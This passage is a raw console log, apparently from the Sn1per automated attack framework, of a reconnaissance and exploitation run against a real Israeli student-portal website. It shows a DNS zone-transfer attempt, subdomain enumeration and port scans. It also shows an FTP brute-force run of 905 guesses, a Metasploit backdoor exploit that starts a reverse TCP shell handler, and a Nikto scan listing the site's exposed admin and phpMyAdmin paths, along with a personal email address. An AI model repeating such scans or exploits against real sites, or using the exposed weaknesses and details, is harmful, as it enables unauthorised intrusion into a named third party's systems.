  1965. Full harvest..
  1966. [-] Searching in Google..
  1967. Searching 0 results...
  1968. Searching 100 results...
  1969. Searching 200 results...
  1970. [-] Searching in PGP Key server..
  1971. [-] Searching in Bing..
  1972.  
  1973. ******************************************************
  1974. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
  1975. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
  1976. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
  1977. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
  1978. * |___/ *
  1979. * Metagoofil Ver 2.2 *
  1980. * Christian Martorella *
  1981. * Edge-Security.com *
  1982. * cmartorella_at_edge-security.com *
  1983. ******************************************************
  1984.  
  1985. [-] Starting online search...
  1986.  
  1987. [-] Searching for doc files, with a limit of 200
  1988. Searching 100 results...
  1989. Searching 200 results...
  1990. Results: 0 files found
  1991. Starting to download 50 of them:
  1992. ----------------------------------------
  1993.  
  1994.  
  1995. [-] Searching for pdf files, with a limit of 200
  1996. Searching 100 results...
  1997. Searching 200 results...
  1998. Results: 0 files found
  1999. Starting to download 50 of them:
  2000. ----------------------------------------
  2001.  
  2002.  
  2003. [-] Searching for xls files, with a limit of 200
  2004. Searching 100 results...
  2005. Searching 200 results...
  2006. Results: 0 files found
  2007. Starting to download 50 of them:
  2008. ----------------------------------------
  2009.  
  2010.  
  2011. [-] Searching for csv files, with a limit of 200
  2012. Searching 100 results...
  2013. Searching 200 results...
  2014. Results: 0 files found
  2015. Starting to download 50 of them:
  2016. ----------------------------------------
  2017.  
  2018.  
  2019. [-] Searching for txt files, with a limit of 200
  2020. Searching 100 results...
  2021. Searching 200 results...
  2022. Results: 0 files found
  2023. Starting to download 50 of them:
  2024. ----------------------------------------
  2025.  
  2026. processing
  2027. user
  2028. email
  2029.  
  2030. [+] List of users found:
  2031. --------------------------
  2032.  
  2033. [+] List of software found:
  2034. -----------------------------
  2035.  
  2036. [+] List of paths and servers found:
  2037. ---------------------------------------
  2038.  
  2039. [+] List of e-mails found:
  2040. ----------------------------
  2041.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  2042.  
  2043. ; <<>> DiG 9.11.2-5-Debian <<>> -x hapetek.co.il
  2044. ;; global options: +cmd
  2045. ;; Got answer:
  2046. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 12503
  2047. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  2048.  
  2049. ;; OPT PSEUDOSECTION:
  2050. ; EDNS: version: 0, flags:; udp: 4096
  2051. ;; QUESTION SECTION:
  2052. ;il.co.hapetek.in-addr.arpa. IN PTR
  2053.  
  2054. ;; AUTHORITY SECTION:
  2055. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102519 1800 900 604800 3600
  2056.  
  2057. ;; Query time: 279 msec
  2058. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  2059. ;; WHEN: Sat Dec 30 21:28:19 EST 2017
  2060. ;; MSG SIZE rcvd: 123
  2061.  
  2062. dnsenum VERSION:1.2.4
  2063. 
  2064. ----- hapetek.co.il -----
  2065. 
  2066.  
  2067. Host's addresses:
  2068. __________________
  2069.  
  2070. hapetek.co.il. 14360 IN A 212.143.6.110
  2071. 
  2072.  
  2073. Name Servers:
  2074. ______________
  2075.  
  2076. ns1.hapetek.co.il. 14360 IN A 212.143.6.114
  2077. ns2.hapetek.co.il. 14360 IN A 212.143.6.114
  2078. nypop.elron.net. 559 IN A 199.203.1.20
  2079. dns.netvision.net.il. 53876 IN A 194.90.1.5
  2080. 
  2081.  
  2082. Mail (MX) Servers:
  2083. ___________________
  2084.  
  2085. 
  2086.  
  2087. Trying Zone Transfers and getting Bind Versions:
  2088. _________________________________________________
  2089.  
  2090. 
  2091. Trying Zone Transfer for hapetek.co.il on ns1.hapetek.co.il ...
  2092.  
  2093. Trying Zone Transfer for hapetek.co.il on ns2.hapetek.co.il ...
  2094.  
  2095. Trying Zone Transfer for hapetek.co.il on nypop.elron.net ...
  2096.  
  2097. Trying Zone Transfer for hapetek.co.il on dns.netvision.net.il ...
  2098.  
  2099. brute force file not specified, bay.
  2100.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  2101. 
  2102. ____ _ _ _ _ _____
  2103. / ___| _ _| |__ | (_)___| |_|___ / _ __
  2104. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  2105. ___) | |_| | |_) | | \__ \ |_ ___) | |
  2106. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  2107.  
  2108. # Coded By Ahmed Aboul-Ela - @aboul3la
  2109.  
  2110. [-] Enumerating subdomains now for hapetek.co.il
  2111. [-] verbosity is enabled, will show the subdomains results in realtime
  2112. [-] Searching now in Baidu..
  2113. [-] Searching now in Yahoo..
  2114. [-] Searching now in Google..
  2115. [-] Searching now in Bing..
  2116. [-] Searching now in Ask..
  2117. [-] Searching now in Netcraft..
  2118. [-] Searching now in DNSdumpster..
  2119. [-] Searching now in Virustotal..
  2120. [-] Searching now in ThreatCrowd..
  2121. [-] Searching now in SSL Certificates..
  2122. [-] Searching now in PassiveDNS..
  2123. Yahoo: www.hapetek.co.il
  2124. Virustotal: ns1.hapetek.co.il
  2125. Virustotal: www.hapetek.co.il
  2126. DNSdumpster: www.hapetek.co.il
  2127. DNSdumpster: ns2.hapetek.co.il
  2128. DNSdumpster: ns1.hapetek.co.il
  2129. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-hapetek.co.il.txt
  2130. [-] Total Unique Subdomains Found: 3
  2131. www.hapetek.co.il
  2132. ns1.hapetek.co.il
  2133. ns2.hapetek.co.il
  2134.  
  2135.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  2136.  ║ ╠╦╝ ║ ╚═╗╠═╣
  2137.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  2138.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  2139. 
  2140.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-hapetek.co.il-full.txt
  2141. 
  2142.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  2143.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  2144.  
  2145.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  2146. PING hapetek.co.il (212.143.6.110) 56(84) bytes of data.
  2147.  
  2148. --- hapetek.co.il ping statistics ---
  2149. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
  2150.  
  2151.  
  2152.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  2153.  
  2154. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 21:29 EST
  2155. Nmap scan report for hapetek.co.il (212.143.6.110)
  2156. Host is up (0.18s latency).
  2157. Not shown: 468 filtered ports, 2 closed ports
  2158. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  2159. PORT STATE SERVICE
  2160. 21/tcp open ftp
  2161. 80/tcp open http
  2162. 443/tcp open https
  2163.  
  2164. Nmap done: 1 IP address (1 host up) scanned in 7.08 seconds
  2165.  
  2166.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  2167.  + -- --=[Port 21 opened... running tests...
  2168.  
  2169. Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-30 21:29 EST
  2170. Nmap scan report for hapetek.co.il (212.143.6.110)
  2171. Host is up (0.18s latency).
  2172.  
  2173. PORT STATE SERVICE VERSION
  2174. 21/tcp open ftp vsftpd 2.0.8 or later
  2175. | ftp-brute:
  2176. | Accounts: No valid accounts found
  2177. |_ Statistics: Performed 905 guesses in 183 seconds, average tps: 4.5
  2178. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2179. Device type: general purpose|WAP|terminal|firewall
  2180. Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (90%), HP embedded (89%), IGEL embedded (87%), IPFire 2.X (85%)
  2181. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/h:hp:msm410 cpe:/o:linux:linux_kernel:2.6 cpe:/h:igel:ud3 cpe:/o:linux:linux_kernel:3.2.0 cpe:/o:linux:linux_kernel:2.4 cpe:/o:ipfire:ipfire:2.11
  2182. Aggressive OS guesses: Linux 2.6.32 (90%), HP MSM410 WAP (89%), Linux 2.6.35 (87%), IGEL UD3 thin client (Linux 2.6) (87%), Linux 3.2.0 (87%), Linux 2.6.32 - 2.6.35 (86%), Linux 2.6.17 - 2.6.36 (85%), DD-WRT v24-sp1 (Linux 2.4) (85%), IPFire 2.11 firewall (Linux 2.6.32) (85%)
  2183. No exact OS matches for host (test conditions non-ideal).
  2184. Network Distance: 16 hops
  2185. Service Info: Host: Hapetek
  2186.  
  2187. TRACEROUTE (using port 21/tcp)
  2188. HOP RTT ADDRESS
  2189. 1 110.62 ms 10.13.0.1
  2190. 2 110.83 ms 37.187.24.253
  2191. 3 110.69 ms 10.50.225.61
  2192. 4 110.82 ms 10.17.129.40
  2193. 5 110.68 ms 10.73.0.54
  2194. 6 ...
  2195. 7 113.88 ms be100-1111.ldn-5-a9.uk.eu (213.251.128.65)
  2196. 8 ...
  2197. 9 113.39 ms ldn-bb3-link.telia.net (62.115.114.234)
  2198. 10 127.91 ms ldn-b4-link.telia.net (62.115.119.145)
  2199. 11 113.61 ms netvision-ic-304535.c.telia.net (213.248.89.250)
  2200. 12 ...
  2201. 13 172.06 ms gw2-0-2-1-4-hfa-gw2-lnd.nv.net.il (212.143.12.80)
  2202. 14 177.55 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
  2203. 15 178.25 ms srvc4-10-1-core1-hfa.hfa.nv.net.il (212.143.7.83)
  2204. 16 176.64 ms 212.143.6.110
  2205.  
  2206. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2207. Nmap done: 1 IP address (1 host up) scanned in 209.52 seconds
  2208.  ____________
  2209. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  2210. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  2211. [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
  2212. [% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
  2213. [% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
  2214. [% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
  2215. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
  2216. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  2217. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  2218. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
  2219. 
  2220.  
  2221. =[ metasploit v4.16.26-dev ]
  2222. + -- --=[ 1714 exploits - 975 auxiliary - 300 post ]
  2223. + -- --=[ 507 payloads - 40 encoders - 10 nops ]
  2224. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2225.  
  2226. RHOST => hapetek.co.il
  2227. RHOSTS => hapetek.co.il
  2228. [*] hapetek.co.il:21 - Banner: 220 Welcome to Hapetek FTP service.
  2229. [*] hapetek.co.il:21 - USER: 331 Please specify the password.
  2230. [*] Exploit completed, but no session was created.
  2231. [*] Started reverse TCP double handler on 10.13.2.94:4444
  2232. [*] hapetek.co.il:21 - Sending Backdoor Command
  2233. [*] Exploit completed, but no session was created.
  2234.  + -- --=[Port 22 closed... skipping.
  2235.  + -- --=[Port 23 closed... skipping.
  2236.  + -- --=[Port 25 closed... skipping.
  2237.  + -- --=[Port 53 closed... skipping.
  2238.  + -- --=[Port 79 closed... skipping.
  2239.  + -- --=[Port 80 opened... running tests...
  2240.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  2241.  
  2242. ^ ^
  2243. _ __ _ ____ _ __ _ _ ____
  2244. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  2245. | V V // o // _/ | V V // 0 // 0 // _/
  2246. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  2247. <
  2248. ...'
  2249.  
  2250. WAFW00F - Web Application Firewall Detection Tool
  2251.  
  2252. By Sandro Gauci && Wendel G. Henrique
  2253.  
  2254. Checking http://hapetek.co.il
  2255. Generic Detection results:
  2256. No WAF detected by the generic detection
  2257. Number of requests: 13
  2258.  
  2259.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  2260. http://hapetek.co.il [301 Moved Permanently] Apache[2.2.14], Country[ISRAEL][IL], HTTPServer[Ubuntu Linux][Apache/2.2.14 (Ubuntu)], IP[212.143.6.110], PHP[5.3.2-1ubuntu4.11], RedirectLocation[http://www.hapetek.co.il/], X-Powered-By[PHP/5.3.2-1ubuntu4.11], x-pingback[http://www.hapetek.co.il/xmlrpc.php]
  2261. http://www.hapetek.co.il/ [200 OK] Apache[2.2.14], Country[ISRAEL][IL], Email[//avi.bandel@gmail.com,avi.bandel@gmail.com], HTML5, HTTPServer[Ubuntu Linux][Apache/2.2.14 (Ubuntu)], IP[212.143.6.110], JQuery[1.11.1], MetaGenerator[WordPress 4.1], PHP[5.3.2-1ubuntu4.11], Script[text/javascript], Title[הפתק | פורטל הסטודנטים], WordPress[4.1], X-Powered-By[PHP/5.3.2-1ubuntu4.11], x-pingback[http://www.hapetek.co.il/xmlrpc.php]
  2262.  
  2263.  __ ______ _____ 
  2264.  \ \/ / ___|_ _|
  2265.  \ /\___ \ | | 
  2266.  / \ ___) || | 
  2267.  /_/\_|____/ |_| 
  2268.  
  2269. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  2270. + -- --=[Target: hapetek.co.il:80
  2271. + -- --=[Site not vulnerable to Cross-Site Tracing!
  2272. + -- --=[Site vulnerable to Host Header Injection!
  2273.  
  2274.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  2275. + -- --=[Checking if X-Content options are enabled on hapetek.co.il... 
  2276.  
  2277. + -- --=[Checking if X-Frame options are enabled on hapetek.co.il... 
  2278.  
  2279. + -- --=[Checking if X-XSS-Protection header is enabled on hapetek.co.il... 
  2280.  
  2281. + -- --=[Checking HTTP methods on hapetek.co.il... 
  2282.  
  2283. + -- --=[Checking if TRACE method is enabled on hapetek.co.il... 
  2284.  
  2285. + -- --=[Checking for META tags on hapetek.co.il... 
  2286.  
  2287. + -- --=[Checking for open proxy on hapetek.co.il... 
  2288. <html>
  2289. <title>Nothing Here</title>
  2290. <body>
  2291. <center><h1>Nothing Here</h1></center>
  2292. </body>
  2293. </html>
  2294.  
  2295. + -- --=[Enumerating software on hapetek.co.il... 
  2296. Server: Apache/2.2.14 (Ubuntu)
  2297. X-Powered-By: PHP/5.3.2-1ubuntu4.11
  2298. X-Pingback: http://www.hapetek.co.il/xmlrpc.php
  2299.  
  2300. + -- --=[Checking if Strict-Transport-Security is enabled on hapetek.co.il... 
  2301.  
  2302. + -- --=[Checking for Flash cross-domain policy on hapetek.co.il... 
  2303. <html><head>
  2304. <title>404 Not Found</title>
  2305. </head><body>
  2306. <h1>Not Found</h1>
  2307. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  2308. <p>Additionally, a 404 Not Found
  2309. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  2310. <hr>
  2311. <address>Apache/2.2.14 (Ubuntu) Server at hapetek.co.il Port 80</address>
  2312. </body></html>
  2313.  
  2314. + -- --=[Checking for Silverlight cross-domain policy on hapetek.co.il... 
  2315. <html><head>
  2316. <title>404 Not Found</title>
  2317. </head><body>
  2318. <h1>Not Found</h1>
  2319. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  2320. <p>Additionally, a 404 Not Found
  2321. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  2322. <hr>
  2323. <address>Apache/2.2.14 (Ubuntu) Server at hapetek.co.il Port 80</address>
  2324. </body></html>
  2325.  
  2326. + -- --=[Checking for HTML5 cross-origin resource sharing on hapetek.co.il... 
  2327.  
  2328. + -- --=[Retrieving robots.txt on hapetek.co.il... 
  2329. <html><head>
  2330. <title>404 Not Found</title>
  2331. </head><body>
  2332. <h1>Not Found</h1>
  2333. <p>The requested URL /robots.txt was not found on this server.</p>
  2334. <p>Additionally, a 404 Not Found
  2335. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  2336. <hr>
  2337. <address>Apache/2.2.14 (Ubuntu) Server at hapetek.co.il Port 80</address>
  2338. </body></html>
  2339.  
  2340. + -- --=[Retrieving sitemap.xml on hapetek.co.il... 
  2341. <html><head>
  2342. <title>404 Not Found</title>
  2343. </head><body>
  2344. <h1>Not Found</h1>
  2345. <p>The requested URL /sitemap.xml was not found on this server.</p>
  2346. <p>Additionally, a 404 Not Found
  2347. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  2348. <hr>
  2349. <address>Apache/2.2.14 (Ubuntu) Server at hapetek.co.il Port 80</address>
  2350. </body></html>
  2351.  
  2352. + -- --=[Checking cookie attributes on hapetek.co.il... 
  2353.  
  2354. + -- --=[Checking for ASP.NET Detailed Errors on hapetek.co.il... 
  2355. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  2356. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  2357.  
  2358. 
  2359.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  2360. - Nikto v2.1.6
  2361. ---------------------------------------------------------------------------
  2362. + Target IP: 212.143.6.110
  2363. + Target Hostname: hapetek.co.il
  2364. + Target Port: 80
  2365. + Start Time: 2017-12-30 21:34:11 (GMT-5)
  2366. ---------------------------------------------------------------------------
  2367. + Server: Apache/2.2.14 (Ubuntu)
  2368. + Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.11
  2369. + The anti-clickjacking X-Frame-Options header is not present.
  2370. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2371. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2372. + Root page / redirects to: http://www.hapetek.co.il/
  2373. + Apache/2.2.14 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
  2374. + Uncommon header 'tcn' found, with contents: list
  2375. + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
  2376. + Server leaks inodes via ETags, header found with file /, inode: 1589359, size: 98, mtime: Sun Nov 12 06:41:16 2006
  2377. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  2378. + Cookie PHPSESSID created without the httponly flag
  2379. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  2380. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  2381. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  2382. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  2383. + OSVDB-3092: /admin/: This might be interesting...
  2384. + OSVDB-3092: /download/: This might be interesting...
  2385. + /new/: PHP include error may indicate local or remote file inclusion is possible.
  2386. + OSVDB-3092: /new/: This might be interesting...
  2387. + OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  2388. + OSVDB-3092: /readme: This might be interesting...
  2389. + /stat/: Potential PHP MySQL database connection string found.
  2390. + OSVDB-3092: /stat/: This might be interesting...
  2391. + OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
  2392. + OSVDB-3268: /icons/: Directory indexing found.
  2393. + OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
  2394. + OSVDB-3233: /icons/README: Apache default file found.
  2395. + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
  2396. + OSVDB-62684: /wp-content/plugins/hello.php: The WordPress hello.php plugin reveals a file system path
  2397. + /wp-links-opml.php: This WordPress script reveals the installed version.
  2398. + OSVDB-3092: /license.txt: License file found may identify site software.
  2399. + Cookie wordpress_test_cookie created without the httponly flag
  2400. + /wp-login/: Admin login page/section found.
  2401. + /phpmyadmin/: phpMyAdmin directory found
  2402. + OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
  2403. + 9425 requests: 0 error(s) and 34 item(s) reported on remote host
  2404. + End Time: 2017-12-30 22:06:21 (GMT-5) (1930 seconds)
  2405. ---------------------------------------------------------------------------
  2406. + 1 host(s) tested
  2407.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  2408. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/hapetek.co.il-port80.jpg
  2409.  + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
  2410.  + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
  2411.  
  2412.  _____  .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
  2413.  (_____) 01 01N. C 01 C 01 .01. 01  01 Yb 01 .01.
  2414.  (() ()) 01 C YCb C 01 C 01 ,C9 01  01 dP 01 ,C9
  2415.  \ /  01 C .CN. C 01 C 0101dC9 01  01'''bg. 0101dC9
  2416.  \ /  01 C .01.C 01 C 01 YC. 01 ,  01 .Y 01 YC.
  2417.  /=\  01 C Y01 YC. ,C 01 .Cb. 01 ,C  01 ,9 01 .Cb.
  2418.  [___]  .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
  2419.  
  2420. __[ ! ] Neither war between hackers, nor peace for the system.
  2421. __[ ! ] http://blog.inurl.com.br
  2422. __[ ! ] http://fb.com/InurlBrasil
  2423. __[ ! ] http://twitter.com/@googleinurl
  2424. __[ ! ] http://github.com/googleinurl
  2425. __[ ! ] Current PHP version::[ 7.0.26-1 ]
  2426. __[ ! ] Current script owner::[ root ]
  2427. __[ ! ] Current uname::[ Linux Kali 4.14.0-kali1-amd64 #1 SMP Debian 4.14.2-1kali1 (2017-12-04) x86_64 ]
  2428. __[ ! ] Current pwd::[ /usr/share/sniper ]
  2429. __[ ! ] Help: php inurlbr.php --help
  2430. ------------------------------------------------------------------------------------------------------------------------
  2431.  
  2432. [ ! ] Starting SCANNER INURLBR 2.1 at [30-12-2017 22:14:56]
  2433. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  2434. It is the end user's responsibility to obey all applicable local, state and federal laws.
  2435. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  2436.  
  2437. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-hapetek.co.il.txt ]
  2438. [ INFO ][ DORK ]::[ site:hapetek.co.il ]
  2439. [ INFO ][ SEARCHING ]:: {
  2440. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.co.ve ]
  2441.  
  2442. [ INFO ][ SEARCHING ]:: 
  2443. -[:::]
  2444. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  2445.  
  2446. [ INFO ][ SEARCHING ]:: 
  2447. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  2448. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.mx ID: 002901626849897788481:cpnctza84gq ]
  2449.  
  2450. [ INFO ][ SEARCHING ]:: 
  2451. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  2452.  
  2453. [ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
  2454.  
  2455. 
  2456.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2457. |_[ + ] [ 0 / 100 ]-[22:15:09] [ - ] 
  2458. |_[ + ] Target:: [ http://www.hapetek.co.il/ ]
  2459. |_[ + ] Exploit:: 
  2460. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2461. |_[ + ] More details::  / - / , ISP: 
  2462. |_[ + ] Found:: UNIDENTIFIED
  2463. 
  2464.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2465. |_[ + ] [ 1 / 100 ]-[22:15:12] [ ! ] 
  2466. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  http://www.hapetek.co.il/games/nblox/ ]
  2467. |_[ + ] Exploit:: 
  2468. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2469. |_[ + ] More details::  / - / , ISP: 
  2470. |_[ + ] Found::  INDEFINITE-02 - VALUE: Fatal error
  2471. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-hapetek.co.il.txt
  2472. 
  2473.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2474. |_[ + ] [ 2 / 100 ]-[22:15:15] [ ! ] 
  2475. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  http://www.hapetek.co.il/resume/ ]
  2476. |_[ + ] Exploit:: 
  2477. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2478. |_[ + ] More details::  / - / , ISP: 
  2479. |_[ + ] Found::  INDEFINITE-02 - VALUE: Fatal error
  2480. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-hapetek.co.il.txt
  2481. 
  2482.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2483. |_[ + ] [ 3 / 100 ]-[22:15:18] [ ! ] 
  2484. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  http://www.hapetek.co.il/upload/ ]
  2485. |_[ + ] Exploit:: 
  2486. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2487. |_[ + ] More details::  / - / , ISP: 
  2488. |_[ + ] Found::  INDEFINITE-02 - VALUE: Fatal error
  2489. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-hapetek.co.il.txt
  2490. 
  2491.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2492. |_[ + ] [ 4 / 100 ]-[22:15:21] [ ! ] 
  2493. |_[ + ] Target:: [ ( POTENTIALLY VULNERABLE )  http://www.hapetek.co.il/games/head-blast/ ]
  2494. |_[ + ] Exploit:: 
  2495. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2496. |_[ + ] More details::  / - / , ISP: 
  2497. |_[ + ] Found::  INDEFINITE-02 - VALUE: Fatal error
  2498. |_[ + ] VALUE SAVED IN THE FILE:: inurlbr-hapetek.co.il.txt
  2499. 
  2500.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2501. |_[ + ] [ 5 / 100 ]-[22:15:22] [ - ] 
  2502. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=95 ]
  2503. |_[ + ] Exploit:: 
  2504. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2505. |_[ + ] More details::  / - / , ISP: 
  2506. |_[ + ] Found:: UNIDENTIFIED
  2507. 
  2508.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2509. |_[ + ] [ 6 / 100 ]-[22:15:22] [ - ] 
  2510. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8832 ]
  2511. |_[ + ] Exploit:: 
  2512. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2513. |_[ + ] More details::  / - / , ISP: 
  2514. |_[ + ] Found:: UNIDENTIFIED
  2515. 
  2516.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2517. |_[ + ] [ 7 / 100 ]-[22:15:23] [ - ] 
  2518. |_[ + ] Target:: [ http://www.hapetek.co.il/download.php?id=8922 ]
  2519. |_[ + ] Exploit:: 
  2520. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.11, IP:212.143.6.110:80 
  2521. |_[ + ] More details::  / - / , ISP: 
  2522. |_[ + ] Found:: UNIDENTIFIED
  2523. 
  2524.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  2525. |_[ + ] [ 8 / 100 ]-[22:15:24] [ - ] 
